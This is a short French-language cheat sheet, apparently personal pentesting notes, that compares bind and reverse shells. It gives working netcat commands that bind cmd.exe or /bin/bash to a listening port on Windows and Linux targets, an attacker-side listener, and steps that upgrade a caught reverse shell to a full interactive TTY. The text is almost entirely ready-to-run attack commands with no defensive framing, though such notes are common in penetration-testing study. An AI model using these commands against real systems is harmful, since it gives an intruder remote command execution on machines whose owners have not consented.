BIND SHELL

• le listener est sur la victime
• ouvert a toutes les IP attaquantes
• Peux être souvent bloquée par une règle “Entrante” de Firewall
• Ko si IP de la Victime change

nc.exe -nvlp 1234 -e cmd.exe #listen sur target windows|lance cmd.exe dès qu'on reçoit la connexion
nc -nvlp 1234 -c /bin/bash #listen sur target Linux|execute bash à la connection

ReverseShell

• listener est sur l’attaquant
• limité a l’ip + port machine attaquante
• pas besoin de netcat sur la victime/target
• IP attaquante visible sur la cible !

AMELIORER LE REVERSE

 #listener sur kali
 nc –lvnp 1234

# spawn de bash sur shell victim
 
 script -qc /bin/bash /dev/null
# ou bien

 python -c 'import pty; pty.spawn("/bin/bash")'

ctrl-z

#sur shell kali
stty size #pour connaitre le nbre de cols et rows
stty raw -echo;fg # amelioration shell (autocompletion) ; retour reverse shell

reset

Terminal type=xterm